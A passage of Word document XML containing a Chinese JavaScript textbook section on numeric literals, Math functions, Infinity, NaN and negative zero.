        <w:t>开始，其后跟随一个由</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>～</w:t>
      </w:r>
      <w:r>
        <w:t>7</w:t>
      </w:r>
      <w:r>
        <w:t>（包括</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>7</w:t>
      </w:r>
      <w:r>
        <w:t>）之间的数字组成的序列，例如：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>0377//3*64+7*8+7=255(</w:t>
      </w:r>
      <w:r>
        <w:t>十进制</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>由于某些</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>的实现支持八进制直接量，而有些不支持，因此最好不要使用以</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>为前缀的整型直接量，毕竟我们也无法得知当前</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>的实现是否支持八进制的解析。在</w:t>
      </w:r>
      <w:r>
        <w:t>ECMAScript 6</w:t>
      </w:r>
      <w:r>
        <w:t>（见</w:t>
      </w:r>
      <w:r>
        <w:t>5.7.3</w:t>
      </w:r>
      <w:r>
        <w:t>节）的严格模式下，八进制直接量是明令禁止的。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="41" w:name="3_1_2_Fu_Dian_Xing_Zhi_Jie_Liang_"/>
      <w:r>
        <w:t>3.1.2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　浮点型直接量</w:t>
      </w:r>
      <w:bookmarkEnd w:id="41"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>浮点型直接量可以含有小数点，它们采用的是传统的实数写法。一个实数由整数部分、小数点和小数部分组成。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>此外，还可以使用指数记数</w:t>
      </w:r>
      <w:r>
        <w:t>法表示浮点型直接量，即在实数后跟字母</w:t>
      </w:r>
      <w:r>
        <w:t>e</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>E</w:t>
      </w:r>
      <w:r>
        <w:t>，后面再跟正负号，其后再加一个整型的指数。这种记数方法表示的数值，是由前面的实数乘以</w:t>
      </w:r>
      <w:r>
        <w:t>10</w:t>
      </w:r>
      <w:r>
        <w:t>的指数次幂。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>可以使用更简洁的语法表示：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>[digits][.digits][(E|e)[(+|-)]digits]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>例如：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>3.14</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>2345.789</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>.333333333333333333</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>6.02e23//6.02×10</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="6Text"/>
        </w:rPr>
        <w:t>23</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>1.4738223E-32//1.4738223×10</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="6Text"/>
        </w:rPr>
        <w:t>-32</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="42" w:name="3_1_3_JavaScriptZhong_De_Suan_Zhu_Yun_Su"/>
      <w:r>
        <w:t>3.1.3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>中的算术运算</w:t>
      </w:r>
      <w:bookmarkEnd w:id="42"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>程序是使用语言本身提供的算术运算符来进行数字运算的。这些运算符包括加法运算符（</w:t>
      </w:r>
      <w:r>
        <w:t>+</w:t>
      </w:r>
      <w:r>
        <w:t>）、减法运算符（</w:t>
      </w:r>
      <w:r>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:t>）、乘</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>法运算符（</w:t>
      </w:r>
      <w:r>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:t>）、除法运算符（</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:t>）和求余（求整除后的余数）运算符（</w:t>
      </w:r>
      <w:r>
        <w:t>%</w:t>
      </w:r>
      <w:r>
        <w:t>）。第</w:t>
      </w:r>
      <w:r>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t>章将详细介绍这些以及更多的运算符。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>除了基本的运算符外，</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>还支持更加复杂的算术运算，这些复杂运算通过作为</w:t>
      </w:r>
      <w:r>
        <w:t>Math</w:t>
      </w:r>
      <w:r>
        <w:t>对象的属性定义的函数和常量来实现：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>Math.pow(2,53)//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>9007199254740992:2</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>53</w:t>
      </w:r>
      <w:r>
        <w:t>次幂</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>Math.round(.6)//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>1.0:</w:t>
      </w:r>
      <w:r>
        <w:t>四舍五入</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>Math</w:t>
      </w:r>
      <w:r>
        <w:t>.ceil(.6)//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>1.0:</w:t>
      </w:r>
      <w:r>
        <w:t>向上求整</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>Math.floor(.6)//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>0.0:</w:t>
      </w:r>
      <w:r>
        <w:t>向下求整</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>Math.abs(-5)//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>5:</w:t>
      </w:r>
      <w:r>
        <w:t>求绝对值</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>Math.max(x,y,z)//</w:t>
      </w:r>
      <w:r>
        <w:t>返回最大值</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>Math.min(x,y,z)//</w:t>
      </w:r>
      <w:r>
        <w:t>返回最小值</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>Math.random()//</w:t>
      </w:r>
      <w:r>
        <w:t>生成一个大于等于</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>小于</w:t>
      </w:r>
      <w:r>
        <w:t>1.0</w:t>
      </w:r>
      <w:r>
        <w:t>的伪随机数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>Math.PI//π:</w:t>
      </w:r>
      <w:r>
        <w:t>圆周率</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>Math.E//e:</w:t>
      </w:r>
      <w:r>
        <w:t>自然对数的底数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>Math.sqrt(3)//3</w:t>
      </w:r>
      <w:r>
        <w:t>的平方根</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>Math.pow(3,1/3)//3</w:t>
      </w:r>
      <w:r>
        <w:t>的立方根</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>Math.sin(0)//</w:t>
      </w:r>
      <w:r>
        <w:t>三角函数</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:t>还有</w:t>
      </w:r>
      <w:r>
        <w:t>Math.co</w:t>
      </w:r>
      <w:r>
        <w:t>s,Math.atan</w:t>
      </w:r>
      <w:r>
        <w:t>等</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>Math.log(10)//10</w:t>
      </w:r>
      <w:r>
        <w:t>的自然对数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>Math.log(100)/Math.LN10//</w:t>
      </w:r>
      <w:r>
        <w:t>以</w:t>
      </w:r>
      <w:r>
        <w:t>10</w:t>
      </w:r>
      <w:r>
        <w:t>为底</w:t>
      </w:r>
      <w:r>
        <w:t>100</w:t>
      </w:r>
      <w:r>
        <w:t>的对数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>Math.log(512)/Math.LN2//</w:t>
      </w:r>
      <w:r>
        <w:t>以</w:t>
      </w:r>
      <w:r>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:t>为底</w:t>
      </w:r>
      <w:r>
        <w:t>512</w:t>
      </w:r>
      <w:r>
        <w:t>的对数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>Math.exp(3)//e</w:t>
      </w:r>
      <w:r>
        <w:t>的三次幂</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>参阅第三部分中关于</w:t>
      </w:r>
      <w:r>
        <w:t>Math</w:t>
      </w:r>
      <w:r>
        <w:t>对象的介绍，那里列出了</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>所支持的所有数学函数。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>中的算术运算在溢出（</w:t>
      </w:r>
      <w:r>
        <w:t>overflow</w:t>
      </w:r>
      <w:r>
        <w:t>）、下溢（</w:t>
      </w:r>
      <w:r>
        <w:t>underflow</w:t>
      </w:r>
      <w:r>
        <w:t>）或被零整除时不会报错。当数字运算结果超过了</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>所能表示的数字上限（溢出），结果为一个特殊的无穷大（</w:t>
      </w:r>
      <w:r>
        <w:t>infinity</w:t>
      </w:r>
      <w:r>
        <w:t>）值，在</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>中以</w:t>
      </w:r>
      <w:r>
        <w:t>Infinity</w:t>
      </w:r>
      <w:r>
        <w:t>表示。同样地，当负数的值超过了</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>所能表示的负数范围，结果为负无穷大，在</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>中以</w:t>
      </w:r>
      <w:r>
        <w:t>-Infinity</w:t>
      </w:r>
      <w:r>
        <w:t>表示。无穷大值的行为特性和我们所期望的是一致的：基于它们的加、减、乘和除运算结果还是无穷大值（当然还保留它们的正负号）</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>下溢（</w:t>
      </w:r>
      <w:r>
        <w:t>underflow</w:t>
      </w:r>
      <w:r>
        <w:t>）是当运算结果无限接近于零并比</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>能表示的最小值还小的时候发生的一种情形。这种情况下，</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>将会返回</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>。当一个负数发生下溢时，</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>返回一个特殊的值</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>负零</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>。这个值（负零）几乎和正常的零完全一样，</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>程序员很少用到负零。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>被零整除在</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>并不报错：它只是简单的返回无穷大（</w:t>
      </w:r>
      <w:r>
        <w:t>Infinity</w:t>
      </w:r>
      <w:r>
        <w:t>）或负无穷大（</w:t>
      </w:r>
      <w:r>
        <w:t>-Infinity</w:t>
      </w:r>
      <w:r>
        <w:t>）。但有一个例外，零除以零是没有意义的，这种整除运算结果也是一个非数字（</w:t>
      </w:r>
      <w:r>
        <w:t>not-a-num</w:t>
      </w:r>
      <w:r>
        <w:t>ber</w:t>
      </w:r>
      <w:r>
        <w:t>）值，用</w:t>
      </w:r>
      <w:r>
        <w:t>NaN</w:t>
      </w:r>
      <w:r>
        <w:t>表示。无穷大除以无穷大、给任意负数作开方运算或者算术运算符与不是数字或无法转换为数字的操作数一起使用时都将返回</w:t>
      </w:r>
      <w:r>
        <w:t>NaN</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>预定义了全局变量</w:t>
      </w:r>
      <w:r>
        <w:t>Infinity</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>NaN</w:t>
      </w:r>
      <w:r>
        <w:t>，用来表示正无穷大和非数字值。在</w:t>
      </w:r>
      <w:r>
        <w:t>ECMAScript 3</w:t>
      </w:r>
      <w:r>
        <w:t>中，这两个值是可读</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:t>写的，并</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>可修改。</w:t>
      </w:r>
      <w:r>
        <w:t>ECMAScript 5</w:t>
      </w:r>
      <w:r>
        <w:t>修正了这个错误，将它们定义为只读的。在</w:t>
      </w:r>
      <w:r>
        <w:t>ECMAScript 3</w:t>
      </w:r>
      <w:r>
        <w:t>中</w:t>
      </w:r>
      <w:r>
        <w:t>Number</w:t>
      </w:r>
      <w:r>
        <w:t>对象定义的属性值也是只读的。这里有一些例子：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>Infinity//</w:t>
      </w:r>
      <w:r>
        <w:t>将一个可读</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:t>写的变量初始化为</w:t>
      </w:r>
      <w:r>
        <w:t>infinity</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>Num</w:t>
      </w:r>
      <w:r>
        <w:t>ber.POSITIVE_INFINITY//</w:t>
      </w:r>
      <w:r>
        <w:t>同样的值，只读</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>1/0//</w:t>
      </w:r>
      <w:r>
        <w:t>这也是同样的值</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>Number.MAX_VALUE+1//</w:t>
      </w:r>
      <w:r>
        <w:t>计算结果还是</w:t>
      </w:r>
      <w:r>
        <w:t>Infinity</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>Number.NEGATIVE_INFINITY//</w:t>
      </w:r>
      <w:r>
        <w:t>该表达式表示了负无穷大</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>-Infinity</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>-1/0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>-Number.MAX_VALUE-1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>NaN//</w:t>
      </w:r>
      <w:r>
        <w:t>将一个可读</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:t>写的变量初始化为</w:t>
      </w:r>
      <w:r>
        <w:t>NaN</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>Number.NaN//</w:t>
      </w:r>
      <w:r>
        <w:t>同样的值，但是只读</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>0/0//</w:t>
      </w:r>
      <w:r>
        <w:t>计算结果是</w:t>
      </w:r>
      <w:r>
        <w:t>NaN</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>Number.MIN_VALUE/2//</w:t>
      </w:r>
      <w:r>
        <w:t>发生下溢：计算结果为</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>-Number.MIN_V</w:t>
      </w:r>
      <w:r>
        <w:t>ALUE/2//</w:t>
      </w:r>
      <w:r>
        <w:t>负零</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>-1/Infinity//</w:t>
      </w:r>
      <w:r>
        <w:t>同样是负零</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>-0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>中的非数字值有一点特殊：它和任何值都不相等，包括自身。也就是说，没办法通过</w:t>
      </w:r>
      <w:r>
        <w:t>x==NaN</w:t>
      </w:r>
      <w:r>
        <w:t>来判断变量</w:t>
      </w:r>
      <w:r>
        <w:t>x</w:t>
      </w:r>
      <w:r>
        <w:t>是否是</w:t>
      </w:r>
      <w:r>
        <w:t>NaN</w:t>
      </w:r>
      <w:r>
        <w:t>。相反，应当使用</w:t>
      </w:r>
      <w:r>
        <w:t>x!=x</w:t>
      </w:r>
      <w:r>
        <w:t>来判断，当且仅当</w:t>
      </w:r>
      <w:r>
        <w:t>x</w:t>
      </w:r>
      <w:r>
        <w:t>为</w:t>
      </w:r>
      <w:r>
        <w:t>NaN</w:t>
      </w:r>
      <w:r>
        <w:t>的时候，表达式的结果才为</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>。函数</w:t>
      </w:r>
      <w:r>
        <w:t>isNaN()</w:t>
      </w:r>
      <w:r>
        <w:t>的作用与此类似，如果参数是</w:t>
      </w:r>
      <w:r>
        <w:t>NaN</w:t>
      </w:r>
      <w:r>
        <w:t>或者是一个非数字值（比如字符串和对象），则返回</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>中有一个类似的函数</w:t>
      </w:r>
      <w:r>
        <w:t>isFinite()</w:t>
      </w:r>
      <w:r>
        <w:t>，在参数不是</w:t>
      </w:r>
      <w:r>
        <w:t>NaN</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>Infinity</w:t>
      </w:r>
